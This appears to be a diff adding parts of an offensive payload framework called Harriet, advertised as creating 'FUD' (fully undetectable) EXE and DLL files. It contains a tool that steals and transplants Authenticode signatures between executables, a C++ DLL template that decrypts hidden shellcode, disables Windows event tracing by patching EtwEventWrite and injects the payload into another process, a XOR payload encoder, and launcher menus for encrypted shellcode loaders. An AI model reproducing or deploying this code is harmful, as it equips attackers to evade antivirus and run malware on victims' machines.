+            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
+
+        else:
+            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
+        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
+        # End Windows-Specific Fields of Optional Header
+        # Begin Data Directories of Optional Header
+        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
+        #ImportTable SIZE|LOC
+        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['CertTableLOC'] = binary.tell()
+        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
+        binary.close()
+        return flItms
+
+
+def copyCert(exe):
+    flItms = gather_file_info_win(exe)
+
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Input file Not signed!")
+        sys.exit(-1)
+
+    with open(exe, 'rb') as f:
+        f.seek(flItms['CertLOC'], 0)
+        cert = f.read(flItms['CertSize'])
+    return cert
+
+
+def writeCert(cert, exe, output):
+    flItms = gather_file_info_win(exe)
+    
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+
+    print("Signature appended. \nFIN.")
+
+
+def outputCert(exe, output):
+    cert = copyCert(exe)
+    if not output:
+        output = str(exe) + "_sig"
+
+    print("Output file: {0}".format(output))
+
+    open(output, 'wb').write(cert)
+
+    print("Signature ripped. \nFIN.")
+
+
+def check_sig(exe):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+    else:
+        print("Inputfile is signed!")
+
+
+def truncate(exe, output):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+        sys.exit(-1)
+    else:
+        print( "Inputfile is signed!")
+
+    if not output:
+        output = str(exe) + "_nosig"
+
+    print("Output file: {0}".format(output))
+
+    shutil.copy2(exe, output)
+
+    with open(output, "r+b") as binary:
+        print('Overwriting certificate table pointer and truncating binary')
+        binary.seek(-flItms['CertSize'], io.SEEK_END)
+        binary.truncate()
+        binary.seek(flItms['CertTableLOC'], 0)
+        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+
+    print("Signature removed. \nFIN.")
+
+
+def signfile(exe, sigfile, output):
+    flItms = gather_file_info_win(exe)
+    
+    cert = open(sigfile, 'rb').read()
+
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+    
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+    print("Signature appended. \nFIN.")
+
+
+if __name__ == "__main__":
+    usage = 'usage: %prog [options]'
+    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
+    parser = OptionParser()
+    parser.add_option("-i", "--file", dest="inputfile", 
+                  help="input file", metavar="FILE")
+    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
+                  help='rip signature off inputfile')
+    parser.add_option('-a', '--add', dest='addsig', action='store_true',
+                  help='add signautre to targetfile')
+    parser.add_option('-o', '--output', dest='outputfile',
+                  help='output file')
+    parser.add_option('-s', '--sig', dest='sigfile',
+                  help='binary signature from disk')
+    parser.add_option('-t', '--target', dest='targetfile',
+                  help='file to append signature to')
+    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
+                  help='file to check if signed; does not verify signature')
+    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
+                  help='truncate signature (i.e. remove sig)')
+    (options, args) = parser.parse_args()
+    
+    # rip signature
+    # inputfile and rip to outputfile
+    if options.inputfile and options.ripsig:
+        print("Ripping signature to file!")
+        outputCert(options.inputfile, options.outputfile)
+        sys.exit()    
+
+    # copy from one to another
+    # inputfile and rip to targetfile to outputfile    
+    if options.inputfile and options.targetfile:
+        cert = copyCert(options.inputfile)
+        writeCert(cert, options.targetfile, options.outputfile)
+        sys.exit()
+
+    # check signature
+    # inputfile 
+    if options.inputfile and options.checksig:
+        check_sig(options.inputfile) 
+        sys.exit()
+
+    # add sig to target file
+    if options.targetfile and options.sigfile:
+        signfile(options.targetfile, options.sigfile, options.outputfile)
+        sys.exit()
+        
+    # truncate
+    if options.inputfile and options.truncate:
+        truncate(options.inputfile, options.outputfile)
+        sys.exit()
+
+    parser.print_help()
+    parser.error("You must do something!")
+

Harriet/DLLInj/template.cpp

@@ -0,0 +1,177 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <tlhelp32.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
+
+char XOR_VARIABLE []= "XOR_KEY";
+
+unsigned char fRandom6 []=VIRALO}; 
+unsigned char Random9[]=PROCY};
+
+int aRandom1(char * eRandom5, unsigned int eRandom5_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, eRandom5, &eRandom5_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+int bRandom2(const char *procname) {
+
+        HANDLE hProcSnap;
+        PROCESSENTRY32 pe32;
+        int pid = 0;
+ 
+        hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+        if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
+                
+        pe32.dwSize = sizeof(PROCESSENTRY32); 
+                
+        if (!Process32First(hProcSnap, &pe32)) {
+                CloseHandle(hProcSnap);
+                return 0;
+        }
+                
+        while (Process32Next(hProcSnap, &pe32)) {
+                if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
+                        pid = pe32.th32ProcessID;
+                        break;
+                }
+        }
+                
+        CloseHandle(hProcSnap);
+                
+        return pid;
+}
+
+
+int cRandom3(HANDLE hProc, unsigned char * eRandom5, unsigned int eRandom5_len) {
+
+        LPVOID pRemoteCode = NULL;
+        HANDLE hThread = NULL;
+
+  
+        pRemoteCode = VirtualAllocEx(hProc, NULL, eRandom5_len, MEM_COMMIT, PAGE_EXECUTE_READ);
+        WriteProcessMemory(hProc, pRemoteCode, (PVOID)eRandom5, (SIZE_T)eRandom5_len, (SIZE_T *)NULL);
+        
+        hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL);
+        if (hThread != NULL) {
+                WaitForSingleObject(hThread, 500);
+                CloseHandle(hThread);
+                return 0;
+        }
+        return -1;
+}
+
+void gRandom7(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
+        int r;
+        r = 0;
+        for (int i = 0; i < tada_len; i++) {
+                if (r == XOR_VARIABLE_len - 1) r = 0;
+
+                tada[i] = tada[i] ^ XOR_VARIABLE[r];
+                r++;
+        }
+}
+
+
+extern __declspec(dllexport) int Go(void);
+int Go(void) {
+
+	void * Random8_mem;
+	BOOL rv;
+	HANDLE th;
+    DWORD oldprotect = 0;
+    
+	int pid = 0;
+    HANDLE hProc = NULL;
+	char dRandom4 []=KEYVALUE  
+	unsigned char eRandom5[] =PAYVAL 
+ 
+	unsigned int eRandom5_len = sizeof(eRandom5);
+
+	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
+        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
+
+        #ifdef _WIN64
+        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
+        #else
+        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
+        #endif  
+
+        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
+
+	FreeConsole;
+
+	gRandom7((char *) fRandom6, sizeof (fRandom6), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+        Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), fRandom6);
+
+	
+	Random8_mem = Virt_Alloc(0, eRandom5_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+	aRandom1((char *) eRandom5, eRandom5_len, dRandom4, sizeof(dRandom4));
+	
+	RtlMoveMemory(Random8_mem, eRandom5, eRandom5_len);
+	
+	rv = VirtualProtect(Random8_mem, eRandom5_len, PAGE_EXECUTE_READ, &oldprotect);
+
+	gRandom7((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+	
+	pid = bRandom2(Random9);
+
+	if (pid) {
+
+		hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
+						PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
+						FALSE, (DWORD) pid);
+
+		if (hProc != NULL) {
+			cRandom3(hProc, eRandom5, eRandom5_len);
+			CloseHandle(hProc);
+		}
+	}
+	return 0;
+}
+
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
+
+	switch ( fdwReason ) {
+			case DLL_PROCESS_ATTACH:
+					Go();
+					break;
+			case DLL_THREAD_ATTACH:
+					break;
+			case DLL_THREAD_DETACH:
+					break;
+			case DLL_PROCESS_DETACH:
+					break;
+			}
+	return TRUE;
+}

Harriet/DLLInj/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "XOR_KEY"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

Harriet/EXE.sh

@@ -0,0 +1,84 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+     _   _                 _      _   
+    | | | |               (_)    | |  
+    | |_| | __ _ _ __ _ __ _  ___| |_ 
+    |  _  |/ _  | __|  __| |/ _ \ __|
+    | | | | (_| | |  | |  | |  __/ |_ 
+    \_| |_/\__,_|_|  |_|  |_|\___|\__|
+                                                                                
+          **by assume-breach**
+
+A Payload Framework Waiting To Be Signatured"
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE Fully-Automated AES Encryption"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE Fully-Automated AES Encryption w/ Process Injection"
+echo -e "$BOLD_BLUE 3.$BOLD_WHITE Fully-Automated AES Encrypted QueueUserAPC Shellcode Execution"
+echo -e "$BOLD_BLUE 4.$BOLD_WHITE Fully-Automated AES Encrypted ThreadPoolWait Shellcode Execution"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash Harriet/FULLAes/FULLAes.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash Harriet/FULLInj/FULLInj.sh
+
+elif [ $CHOICE == 3 ]; then
+        echo ""
+        bash Harriet/QueueUserAPC/QueueUser.sh
+
+elif [ $CHOICE == 4 ]; then
+        echo ""
+        bash Harriet/ThreadPoolWait/TPW.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi
+

Harriet/Harriet.sh

@@ -0,0 +1,73 @@
+\#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+     _   _                 _      _   
+    | | | |               (_)    | |  
+    | |_| | __ _ _ __ _ __ _  ___| |_ 
+    |  _  |/ _  | __|  __| |/ _ \ __|
+    | | | | (_| | |  | |  | |  __/ |_ 
+    \_| |_/\__,_|_|  |_|  |_|\___|\__|
+                                                                                
+          **by assume-breach**
+
+A Payload Framework Waiting To Be Signatured"
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE Create FUD EXE"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE Create FUD DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash EXE.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash DLL.sh
+
+else
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi